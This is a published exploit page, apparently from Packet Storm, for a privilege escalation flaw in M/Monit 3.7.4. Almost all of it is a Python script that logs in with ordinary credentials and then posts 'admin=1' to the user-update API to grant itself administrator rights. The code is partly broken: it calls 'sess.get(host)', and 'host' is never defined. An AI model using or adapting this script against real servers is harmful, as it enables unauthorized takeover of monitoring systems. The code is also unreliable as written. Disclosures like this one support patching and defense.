M/Monit version 3.7.4 suffers from a privilege escalation vulnerability.
940af9a4fdd41005d1f80fc80891326898228ca47a2d355adeb0d8951f939180# Title: M/Monit 3.7.4 - Privilege Escalation
# Author: Dolev Farhi
# Date: 2020-07-09
# Vendor Homepage: https://mmonit.com/
# Version : 3.7.4
import sys
import requests
url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'
sess = requests.Session()
sess.get(host)
def login():
print('Attempting to login...')
data = {
'z_username':username,
'z_password':password
}
headers = {
'Content-Type':'application/x-www-form-urlencoded'
}
resp = sess.post(url + '/z_security_check', data=data, headers=headers)
if resp.ok:
print('Logged in successfully.')
else:
print('Could not login.')
sys.exit(1)
def privesc():
data = {
'uname':username,
'fullname':username,
'password':password,
'admin':1
}
resp = sess.post(url + '/api/1/admin/users/update', data=data)
if resp.ok:
print('Escalated to administrator.')
else:
print('Unable to escalate to administrator.')
return
if __name__ == '__main__':
login()
privesc()
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed